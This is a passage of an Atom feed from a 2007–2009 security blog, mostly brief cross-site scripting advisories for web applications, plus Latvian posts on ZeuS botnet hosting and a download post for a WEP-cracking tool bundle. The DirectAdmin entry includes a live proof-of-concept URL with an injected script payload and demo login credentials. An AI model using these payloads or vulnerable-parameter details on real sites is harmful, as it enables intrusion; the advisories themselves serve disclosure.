src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>2</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1009764183767741775.post-343279149631485820</id><published>2009-06-19T13:59:00.000-07:00</published><updated>2009-06-19T14:00:20.890-07:00</updated><title type='text'>DirectAdmin &lt;= v1.33.6 XSS vuln.</title><content type='html'>###############################################&lt;br /&gt;Vuln. discovered by : r0t&lt;br /&gt;Date: 19 June 2009&lt;br /&gt;vendor:http://www.directadmin.com/&lt;br /&gt;affected versions:v1.33.6 and other &lt;br /&gt;versions also can be affected.&lt;br /&gt;###############################################&lt;br /&gt;&lt;br /&gt;DirectAdmin contains a flaw that allows a remote Cross-Site Scripting attacks.Input passed to the "view" parameter in "CMD_REDIRECT" isn't properly sanitised before being returned to the user.&lt;br /&gt;This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.&lt;br /&gt;##############################################&lt;br /&gt;live PoC:&lt;br /&gt;http://www.directadmin.com:2222/CMD_REDIRECT?view=&lt;br /&gt;advanced&amp;sort1%22%3E%3Cscript%3Ealert(111);%3C/script%3E=1&amp;domain=demo.com&lt;br /&gt;PS.&lt;br /&gt;need to login:&lt;br /&gt;demo_user:demo&lt;br /&gt;###############################################&lt;br /&gt;Solution:&lt;br /&gt;Filter malicious characters and character sequences in a web proxy.&lt;br /&gt;###############################################&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1009764183767741775-343279149631485820?l=pridels-team.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://pridels-team.blogspot.com/feeds/343279149631485820/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=1009764183767741775&amp;postID=343279149631485820' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1009764183767741775/posts/default/343279149631485820'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1009764183767741775/posts/default/343279149631485820'/><link rel='alternate' type='text/html' href='http://pridels-team.blogspot.com/2009/06/directadmin-v1336-xss-vuln.html' title='DirectAdmin &lt;= v1.33.6 XSS vuln.'/><author><name>r0t</name><uri>http://www.blogger.com/profile/10020805488138121878</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1009764183767741775.post-5955737787190605982</id><published>2009-06-19T08:18:00.000-07:00</published><updated>2009-06-19T09:30:06.109-07:00</updated><title type='text'>Trojani zem Latvijas karoga</title><content type='html'>Trojas zirgi un to Botneti*.&lt;br /&gt;Runa ir par to,ka labu laiku atpakal ticis konstatets,bet joprojam nekas nav darits.&lt;br /&gt;Es pat abrinoju tos cilvekus ,kuri apzinoties to ka vinju botneta serveris ,kur nak visi logi* un stav administracijas panelis,to visu pasakumu neparliek uz cita servera.&lt;br /&gt;Pie tadas nodarbes serveri ir jamaina vismaz reizi pa 2-3 menesiem.&lt;br /&gt;Ir viens tads monitoringa saits ka &lt;a href="https://zeustracker.abuse.ch/"&gt;ZeuS Tracker&lt;/a&gt; ,kursh veero ZeuS troja izplatibu timekli.&lt;br /&gt;Tad luk viens no top* Trojana ZeuS hosteriem ir musu pashu &lt;a href="http://www.junik.lv/"&gt;JUNIK&lt;/a&gt; un rekur ari trakeri vesels &lt;a href="https://zeustracker.abuse.ch/monitor.php?as=8206"&gt;saraksts&lt;/a&gt; ar ZeuS adminkam*.&lt;br /&gt;Ka jau ieprieks mineju , ka parak ilgi stav vini tur.&lt;br /&gt;Tapat luk bus vel viena &lt;a href="http://fire.seclab.tuwien.ac.at/chart.php?as=AS8206"&gt;vieta&lt;/a&gt; , kur redzama aktivitates grafika&lt;br /&gt;Pienemsim ka provaideram/hosterim ir pie vienas vietas vai ari piekopj taadu politiku,par tiesibsargajoshajam iestadem nemineshu,bet ir jau ari citi aspekti piemeram Zeus adminka* kada ta naca no developera* ir loti sliktas kvalitates,taapat ka ari Limbo 2 .&lt;br /&gt;Ta ka ir tadi &lt;a href="https://zeustracker.abuse.ch/"&gt;monitoringa&lt;/a&gt; pasakumi, nav jau gruti pat treshajai personai ielist laaciitim veedera un panjemt ko vajag.&lt;br /&gt;&lt;br /&gt;Sikak par ZeuS funkcionalitati varat palasit autora uzceptaja &lt;a href="http://rapidshare.com/files/246336357/manual_en.txt.html"&gt;manuali&lt;/a&gt;.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1009764183767741775-5955737787190605982?l=pridels-team.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://pridels-team.blogspot.com/feeds/5955737787190605982/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=1009764183767741775&amp;postID=5955737787190605982' title='1 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1009764183767741775/posts/default/5955737787190605982'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1009764183767741775/posts/default/5955737787190605982'/><link rel='alternate' type='text/html' href='http://pridels-team.blogspot.com/2009/06/trojani-zem-latvijas-karoga.html' title='Trojani zem Latvijas karoga'/><author><name>r0t</name><uri>http://www.blogger.com/profile/10020805488138121878</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1009764183767741775.post-7952978676018026580</id><published>2009-06-18T06:54:00.000-07:00</published><updated>2009-06-18T07:23:22.370-07:00</updated><title type='text'>Pazudushie Cilveki</title><content type='html'>www pasaule sastaptie cilveki vareetu kadam likties , ka vinji tepat ir ka konfektes aiz vitrinas veikala, ka Tu vinjus redzi un tepat vien ir...Tomer viss ir savadaak.Nupat pasham uznaca kaut kada nostalgija par veciem laikiem* pienemsim to pasu vien netsec.lv , ne es butu manijis DigX ne Mandarin'u, te tev bija te tev izbija.Tapat bija taads pasakums ka X-access (x-access.biz , x-exploitz.com)kas itka bija topa augshgala sava nishaa , bet pec tam kadam kaut kas apnika un viss pajuka,bet cilveku bija daudz ar kuriem vareja dalities zinashanas un tapat vien paterzet.Ir jau brizhi kad mes jutamies ka esam izaugushi pietiekoshi un ka ir jakustas uz priekshu un pashreizeeja vieta nevar iedot to izaugsmes iespeju.&lt;br /&gt;Izaugsme, tas vien ir atsevishkka posta* veerts vaards.&lt;br /&gt;Turpinam ar to ko iesaku,luk shis pats blogs ne es butu manijis :VietMafia,der4444,cembo pedejo gadu laika:( Diemzhel pats daudz kur esmu pie taa vainigs, es pats ik pa bridim pazudu vai nu uz pusgadu ,vai uz gadu un ko tad var gaidit no parejiem.&lt;br /&gt;Teiksat ,ja gribetu butu jau sen atradis..varbut ari, vienkarshi lai apjautatos: ka iet? Neiesi googleet cauram dienam.Pieturos pie shi bloga ari ar ceribu , ka caur shejieni mani vares vel dabut roka.Ta ka, ja kads no manis minetajiem cilvekiem lasa sho droshi dodat par sevi zinat.&lt;br /&gt;&lt;br /&gt;PS&gt;&lt;br /&gt;Nezinu nemaz vairs ko shaja bloga publicet, laikam vajag vai nu vecos biedrus atpakalj dabuut vai nu jaunas asinis*.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1009764183767741775-7952978676018026580?l=pridels-team.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://pridels-team.blogspot.com/feeds/7952978676018026580/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=1009764183767741775&amp;postID=7952978676018026580' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1009764183767741775/posts/default/7952978676018026580'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1009764183767741775/posts/default/7952978676018026580'/><link rel='alternate' type='text/html' href='http://pridels-team.blogspot.com/2009/06/pazudushie-cilveki.html' title='Pazudushie Cilveki'/><author><name>r0t</name><uri>http://www.blogger.com/profile/10020805488138121878</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1009764183767741775.post-8684392882748320387</id><published>2009-06-02T11:45:00.000-07:00</published><updated>2009-06-02T11:57:33.138-07:00</updated><title type='text'>Uz bridi ,kad ir laiks...</title><content type='html'>Roka vienkarsi necelas, lai nemtu un veiktu - copy/paste*,lai uzturetu blogu aktivu.Necelas roka ari lai kadu nodi...u.Tapat ar ievainojamibam ir, ka ir pamaz stimula ,lai ari vinam nodarbotos.&lt;br /&gt;Tapec nolemu pajautat Jums -varbut jums ir kada ideja vai ieteikums par kadu rakstu/iem.&lt;br /&gt;Tad drosi varat rakstit uz krustevs(a)gmail com.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1009764183767741775-8684392882748320387?l=pridels-team.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://pridels-team.blogspot.com/feeds/8684392882748320387/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=1009764183767741775&amp;postID=8684392882748320387' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1009764183767741775/posts/default/8684392882748320387'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1009764183767741775/posts/default/8684392882748320387'/><link rel='alternate' type='text/html' href='http://pridels-team.blogspot.com/2009/06/uz-bridi-kad-ir-laiks.html' title='Uz bridi ,kad ir laiks...'/><author><name>r0t</name><uri>http://www.blogger.com/profile/10020805488138121878</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1009764183767741775.post-7679042633965519283</id><published>2009-05-22T03:03:00.000-07:00</published><updated>2009-05-22T03:15:03.294-07:00</updated><title type='text'>Wifi Hacks AIO 2009</title><content type='html'>&lt;div style="text-align: center;"&gt;Some software&amp;amp;e-books for wardrivers....&lt;br /&gt;enjoy.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://img218.imageshack.us/img218/1111/33o1qx0.jpg"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 343px; height: 246px;" src="http://img218.imageshack.us/img218/1111/33o1qx0.jpg" alt="" border="0" /&gt;&lt;/a&gt; Wifi Hacks AIO 2009&lt;br /&gt;27 in 1 WiFi Hacks Tools &amp;amp; E-Books&lt;br /&gt;&lt;br /&gt;Hacks page 1:&lt;br /&gt;* Comm View for WiFi v5.2484&lt;br /&gt;* Pure NetWorks NetWork Magic 2&lt;br /&gt;* Air Cr@ck&lt;br /&gt;* AP Sniff&lt;br /&gt;* Comm View&lt;br /&gt;* Aerosol&lt;br /&gt;* Easy WiFi Radar&lt;br /&gt;* Boingo Wireless&lt;br /&gt;&lt;br /&gt;Hacks page 2:&lt;br /&gt;* Get Wep Key Of Encrypted Wireless Connection&lt;br /&gt;* WiFi Companion v2.10.4&lt;br /&gt;* Net Stumbler&lt;br /&gt;* WiFi H@ck Tools&lt;br /&gt;* WiFi Internet Access Blocker&lt;br /&gt;* iPig WiFi HotSpot VPN Security&lt;br /&gt;&lt;br /&gt;Hacks page 3:&lt;br /&gt;* Hot Spotter v0.4&lt;br /&gt;* Kismet&lt;br /&gt;* WDG&lt;br /&gt;* AirShort v0.2.7e&lt;br /&gt;* WiFi Hopper v1.2&lt;br /&gt;* Wireless NetWork Ignition&lt;br /&gt;* Wepwedgie - alpha&lt;br /&gt;* Wep Cr@ck&lt;br /&gt;&lt;br /&gt;E-Books:&lt;br /&gt;* O-Reilly Wireless H@cks&lt;br /&gt;* System Cr@cking 2k&lt;br /&gt;* FB! Teaches how to break WiFi&lt;br /&gt;* Collection of H@cking Dictionary&lt;br /&gt;&lt;/div&gt;                                                          * How to Cr@ck WEP&lt;br /&gt;&lt;div style="text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;a href="http://rapidshare.com/files/146664950/Wifi_Hacks_Application_Rebuild__hacks_all_wifi_connections_.rar"&gt;Download link&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1009764183767741775-7679042633965519283?l=pridels-team.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://pridels-team.blogspot.com/feeds/7679042633965519283/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=1009764183767741775&amp;postID=7679042633965519283' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1009764183767741775/posts/default/7679042633965519283'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1009764183767741775/posts/default/7679042633965519283'/><link rel='alternate' type='text/html' href='http://pridels-team.blogspot.com/2009/05/wifi-hacks-aio-2009.html' title='Wifi Hacks AIO 2009'/><author><name>r0t</name><uri>http://www.blogger.com/profile/10020805488138121878</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1009764183767741775.post-6816214124839531106</id><published>2009-05-17T13:59:00.000-07:00</published><updated>2009-05-17T14:00:31.930-07:00</updated><title type='text'>activeCollab XSS and Full Path Disclosure</title><content type='html'>###############################################&lt;br /&gt;Vuln. discovered by : r0t&lt;br /&gt;Date: 17 May 2009&lt;br /&gt;Vendor:http://www.activecollab.com/&lt;br /&gt;affected versions:2.1, corporate&lt;br /&gt;other versions also can be affected.&lt;br /&gt;###############################################&lt;br /&gt;&lt;br /&gt;1.Cross-Site Scripting (XSS) Vulnerability&lt;br /&gt;activeCollab contains a flaw that allows a remote Cross-Site Scripting attacks.Input passed to the "re_route" parameter in "/login?" isn't properly sanitised before being returned to the user.&lt;br /&gt;This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.&lt;br /&gt;&lt;br /&gt;2. Full Path Disclosure&lt;br /&gt;The problem is that it is possible to disclose the full installation path by "testing" XSS vulnerability(look at part 1.)&lt;br /&gt;&lt;br /&gt;###############################################&lt;br /&gt;Solution:&lt;br /&gt;Edit the source code to ensure that input is properly sanitised.&lt;br /&gt;###############################################&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1009764183767741775-6816214124839531106?l=pridels-team.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://pridels-team.blogspot.com/feeds/6816214124839531106/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=1009764183767741775&amp;postID=6816214124839531106' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1009764183767741775/posts/default/6816214124839531106'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1009764183767741775/posts/default/6816214124839531106'/><link rel='alternate' type='text/html' href='http://pridels-team.blogspot.com/2009/05/activecollab-xss-and-full-path.html' title='activeCollab XSS and Full Path Disclosure'/><author><name>r0t</name><uri>http://www.blogger.com/profile/10020805488138121878</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1009764183767741775.post-7872104039329452104</id><published>2009-04-26T09:05:00.000-07:00</published><updated>2009-04-26T09:51:58.575-07:00</updated><title type='text'>numurs&gt;Divi</title><content type='html'>Biju nozudis atkal uz diezgan ilgu laiku.Shogad pie neta esmu pirmo reizi, kaut vai aaraa jau gandriiz vai maijs.&lt;br /&gt;Vasara klaat un vairs nav tas laiks lai vareetu to veltiit PC.&lt;br /&gt;Esmu mazliet par &lt;a href="http://blogs.iss.net/archive/2008Top10VulnResearc.html"&gt;X-Force publikaaciju&lt;/a&gt; ,jo sevi pat tuvu neliktu numuram 2.&lt;br /&gt;Bija laika posms ,kad man patika urkkeeties gar taam ievainojamiibaam un publiskot.&lt;br /&gt;Kaut vai shobriid es ari straadaju, bet ne pie konkreetiem produktiem un ne prieksh publicitaates,kaut vai pieljauju domu par kaadu rakstu , tikai laiks ir tam jaaizbriivee.&lt;br /&gt;Par blogoshanu turpmaako, vizmaz tuvaakajaa laika es neredzu briivaa laika tam,bet ceru ka kaadu dienu atgrieziishos pie iesaaktaa.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;PS.&lt;br /&gt;Starpcitu,  esmu tas pats vien *krustevs* ,kursh gozejas pa NetSec forumu.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1009764183767741775-7872104039329452104?l=pridels-team.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://pridels-team.blogspot.com/feeds/7872104039329452104/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=1009764183767741775&amp;postID=7872104039329452104' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1009764183767741775/posts/default/7872104039329452104'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1009764183767741775/posts/default/7872104039329452104'/><link rel='alternate' type='text/html' href='http://pridels-team.blogspot.com/2009/04/numursdivi.html' title='numurs&gt;Divi'/><author><name>r0t</name><uri>http://www.blogger.com/profile/10020805488138121878</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1009764183767741775.post-7184504146149649605</id><published>2008-09-22T15:50:00.000-07:00</published><updated>2008-09-22T15:51:41.089-07:00</updated><title type='text'>DataSpade XSS vuln.</title><content type='html'>###############################################&lt;br /&gt;Vuln. discovered by : r0t&lt;br /&gt;Date: 23 September 2008&lt;br /&gt;Vendor:http://www.dataspade.com/&lt;br /&gt;affected versions:DataSpade V1.0&lt;br /&gt;other versions also can be affected.&lt;br /&gt;###############################################&lt;br /&gt;&lt;br /&gt;DataSpade contains a flaws that allows a remote Cross-Site Scripting attacks.Input passed to the "ViewName" and "TableName" and "OrderBy" and "FilterField" parameter in "Index.asp" isn't properly sanitised before being returned to the user.&lt;br /&gt;This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.&lt;br /&gt;&lt;br /&gt;###############################################&lt;br /&gt;Solution:&lt;br /&gt;Edit the source code to ensure that input is properly sanitised.&lt;br /&gt;###############################################&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1009764183767741775-7184504146149649605?l=pridels-team.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://pridels-team.blogspot.com/feeds/7184504146149649605/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=1009764183767741775&amp;postID=7184504146149649605' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1009764183767741775/posts/default/7184504146149649605'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1009764183767741775/posts/default/7184504146149649605'/><link rel='alternate' type='text/html' href='http://pridels-team.blogspot.com/2008/09/dataspade-xss-vuln.html' title='DataSpade XSS vuln.'/><author><name>r0t</name><uri>http://www.blogger.com/profile/10020805488138121878</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1009764183767741775.post-8787401409738932363</id><published>2007-10-08T08:32:00.000-07:00</published><updated>2007-10-08T08:53:50.000-07:00</updated><title type='text'>last monthes view</title><content type='html'>My 09.07 plan was get our board back , but even know i don't have enough time to do that.&lt;br /&gt;Its seems that i must ask cembo  to do that.&lt;br /&gt;I checked today our old blog address  which blogger had changed , and there is already new asian blog, they didn't change even slogan  its still UNSECURED SYSTEMS:) Thats look like nice SEO trick:)&lt;br /&gt;Good thing is that securityfocus and CVE already  changed links from pridels.blogspot.com to pridels0.blogspot.com.&lt;br /&gt;Last advisories what i publish  was only XSS  and i will publish them for long, other advisories goes for private public.&lt;br /&gt;Team work seems is gone,  i see only cembo now , so we have 50% less brain and 50% less hands.&lt;br /&gt;With that resources we cant be good enough , but we will contributing also in future ...&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1009764183767741775-8787401409738932363?l=pridels-team.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://pridels-team.blogspot.com/feeds/8787401409738932363/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=1009764183767741775&amp;postID=8787401409738932363' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1009764183767741775/posts/default/8787401409738932363'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1009764183767741775/posts/default/8787401409738932363'/><link rel='alternate' type='text/html' href='http://pridels-team.blogspot.com/2007/10/last-monthes-view.html' title='last monthes view'/><author><name>r0t</name><uri>http://www.blogger.com/profile/10020805488138121878</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1009764183767741775.post-2717839557818262351</id><published>2007-10-07T17:59:00.001-07:00</published><updated>2007-10-07T17:59:43.204-07:00</updated><title type='text'>Wikepage XSS vuln.</title><content type='html'>###############################################&lt;br /&gt;Vuln. discovered by : r0t&lt;br /&gt;Date: 7 October 2007&lt;br /&gt;Vendor:http://www.wikepage.org/&lt;br /&gt;affected versions:Wikepage Opus 13 2007.2&lt;br /&gt;other versions also can be affected.&lt;br /&gt;###############################################&lt;br /&gt;&lt;br /&gt;Wikepage contains a flaw that allows a remote Cross-Site Scripting attacks.Input passed to the "PageContent"  and "PageName" parameter in "index.php" isn't properly sanitised before being returned to the user.&lt;br /&gt;This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.&lt;br /&gt;&lt;br /&gt;note:&lt;br /&gt;Wikepage is derived from Tipiwiki2, so almost same structure, that vuln. you can find also&lt;br /&gt;in current Tipiwiki2.&lt;br /&gt;###############################################&lt;br /&gt;Solution:&lt;br /&gt;Edit the source code to ensure that input is properly sanitised.&lt;br /&gt;###############################################&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1009764183767741775-2717839557818262351?l=pridels-team.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://pridels-team.blogspot.com/feeds/2717839557818262351/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=1009764183767741775&amp;postID=2717839557818262351' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1009764183767741775/posts/default/2717839557818262351'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1009764183767741775/posts/default/2717839557818262351'/><link rel='alternate' type='text/html' href='http://pridels-team.blogspot.com/2007/10/wikepage-xss-vuln.html' title='Wikepage XSS vuln.'/><author><name>r0t</name><uri>http://www.blogger.com/profile/10020805488138121878</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1009764183767741775.post-6645363894786380941</id><published>2007-10-07T17:58:00.001-07:00</published><updated>2007-10-07T17:58:57.071-07:00</updated><title type='text'>Minki XSS vuln.</title><content type='html'>###############################################&lt;br /&gt;Vuln. discovered by : r0t&lt;br /&gt;Date: 7 October 2007&lt;br /&gt;Vendor:http://minki.theprawn.com/&lt;br /&gt;affected versions:Minki 1.30&lt;br /&gt;other versions also can be affected.&lt;br /&gt;###############################################&lt;br /&gt;&lt;br /&gt;Minki contains a flaw that allows a remote Cross-Site Scripting attacks.Input passed to the "page" parameter in "index.php" isn't properly sanitised before being returned to the user.&lt;br /&gt;This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.&lt;br /&gt;&lt;br /&gt;###############################################&lt;br /&gt;Solution:&lt;br /&gt;Edit the source code to ensure that input is properly sanitised.&lt;br /&gt;###############################################&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1009764183767741775-6645363894786380941?l=pridels-team.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://pridels-team.blogspot.com/feeds/6645363894786380941/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=1009764183767741775&amp;postID=6645363894786380941' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1009764183767741775/posts/default/6645363894786380941'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1009764183767741775/posts/default/6645363894786380941'/><link rel='alternate' type='text/html' href='http://pridels-team.blogspot.com/2007/10/minki-xss-vuln.html' title='Minki XSS vuln.'/><author><name>r0t</name><uri>http://www.blogger.com/profile/10020805488138121878</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1009764183767741775.post-1837406243390190889</id><published>2007-10-07T17:57:00.001-07:00</published><updated>2007-10-07T17:57:57.009-07:00</updated><title type='text'>Directory Image Gallery XSS vuln.</title><content type='html'>###############################################&lt;br /&gt;Vuln. discovered by : r0t&lt;br /&gt;Date: 7 October 2007&lt;br /&gt;Vendor:http://splitside.net/store/index.php?main_page=product_info&amp;amp;products_id=1&lt;br /&gt;affected versions:Directory Image Gallery 1.1&lt;br /&gt;other versions also can be affected.&lt;br /&gt;###############################################&lt;br /&gt;&lt;br /&gt;Directory Image Gallery contains a flaw that allows a remote Cross-Site Scripting attacks.Input passed to the "backwardDirectory" parameter in "photos.cfm" isn't properly sanitised before being returned to the user.&lt;br /&gt;This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.&lt;br /&gt;&lt;br /&gt;###############################################&lt;br /&gt;Solution:&lt;br /&gt;Edit the source code to ensure that input is properly sanitised.&lt;br /&gt;###############################################&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1009764183767741775-1837406243390190889?l=pridels-team.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://pridels-team.blogspot.com/feeds/1837406243390190889/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=1009764183767741775&amp;postID=1837406243390190889' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1009764183767741775/posts/default/1837406243390190889'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1009764183767741775/posts/default/1837406243390190889'/><link rel='alternate' type='text/html' href='http://pridels-team.blogspot.com/2007/10/directory-image-gallery-xss-vuln.html' title='Directory Image Gallery XSS vuln.'/><author><name>r0t</name><uri>http://www.blogger.com/profile/10020805488138121878</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1009764183767741775.post-744264100584009894</id><published>2007-10-07T17:56:00.000-07:00</published><updated>2007-10-07T17:57:14.438-07:00</updated><title type='text'>DB Manager XSS vuln.</title><content type='html'>###############################################&lt;br /&gt;Vuln. discovered by : r0t&lt;br /&gt;Date: 7 October 2007&lt;br /&gt;Vendor:http://www.moderndayworld.com/Scripts/Products/?id=S-DM2.0&lt;br /&gt;affected versions:DB Manager 2.0&lt;br /&gt;other versions also can be affected.&lt;br /&gt;###############################################&lt;br /&gt;&lt;br /&gt;DB Manager contains a flaw that allows a remote Cross-Site Scripting attacks.Input passed to the "id" parameter in "Edit.asp" isn't properly sanitised before being returned to the user.&lt;br /&gt;This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.&lt;br /&gt;&lt;br /&gt;###############################################&lt;br /&gt;Solution:&lt;br /&gt;Edit the source code to ensure that input is properly sanitised.&lt;br /&gt;###############################################&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1009764183767741775-744264100584009894?l=pridels-team.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link 